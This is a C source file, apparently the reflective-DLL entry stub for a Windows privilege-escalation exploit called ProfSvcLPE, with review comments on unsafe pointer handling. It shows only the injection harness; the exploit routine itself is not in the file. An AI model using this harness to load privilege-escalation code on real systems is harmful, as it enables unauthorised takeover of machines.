#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include <stdio.h>
#include <stdint.h>
#include <windows.h>
#include "ProfSvcLPE.h"
// Note: we need to define this as an export. For the purposes of our code
// this can be a normal C++ export with standard name mangling,
// but if we needed this to be C-compatible
// we would just prepend extern "C" to the declaration.
// Thin wrapper: forwards the caller-supplied data pointer to exploit().
// exploit() is not defined in this file (presumably declared in ProfSvcLPE.h).
//
// incomingData is passed through unchecked. The only caller visible in this
// file is DllMain, which hands over lpReserved cast to char*, so the pointer
// may be NULL or may not point at a string at all.
//
// NOTE(review): a function named main that takes a single char* is a
// non-standard signature and is invoked here as an ordinary function;
// some compilers warn about or reject this.
int main(char *incomingData)
{
    exploit(incomingData);
    return 0; // same value a main-named function yields when it falls off the end
}
// DLL entry point. Records the module handle in hAppInstance and, on process
// attach, runs main() with whatever the loader passed in lpReserved.
//
// Parameters:
//   hinstDLL   - handle of this module; stored in hAppInstance.
//   dwReason   - notification code; DLL_QUERY_HMODULE and DLL_PROCESS_ATTACH
//                are acted on, every other reason is a no-op.
//   lpReserved - for DLL_QUERY_HMODULE: optional out-pointer that receives the
//                module handle. For DLL_PROCESS_ATTACH: reinterpreted as char*
//                and forwarded to main().
// Returns TRUE unconditionally.
//
// NOTE(review): under the standard Windows loader, lpReserved on
// DLL_PROCESS_ATTACH only distinguishes static from dynamic loads; reading it
// as a string presumably relies on the bundled reflective loader supplying a
// caller-chosen parameter (see REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// at the top of the file). No NULL or bounds check is applied before the
// pointer is used.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    if (dwReason == DLL_QUERY_HMODULE) {
        hAppInstance = hinstDLL;
        // Hand the module handle back only when the caller supplied a slot.
        if (lpReserved != NULL) {
            *(HMODULE *)lpReserved = hAppInstance;
        }
    } else if (dwReason == DLL_PROCESS_ATTACH) {
        char *loaderParam = (char *)lpReserved;

        hAppInstance = hinstDLL;
        // NOTE(review): the original comment on this call says the function
        // cannot be called from DllMain without hanging, yet the call is made
        // here. Microsoft's guidance on work that is unsafe inside DllMain:
        // https://docs.microsoft.com/en-us/windows/win32/dlls/dllmain
        // https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-best-practices
        main(loaderParam);
    }
    // DLL_PROCESS_DETACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH: nothing to do.

    return TRUE;
}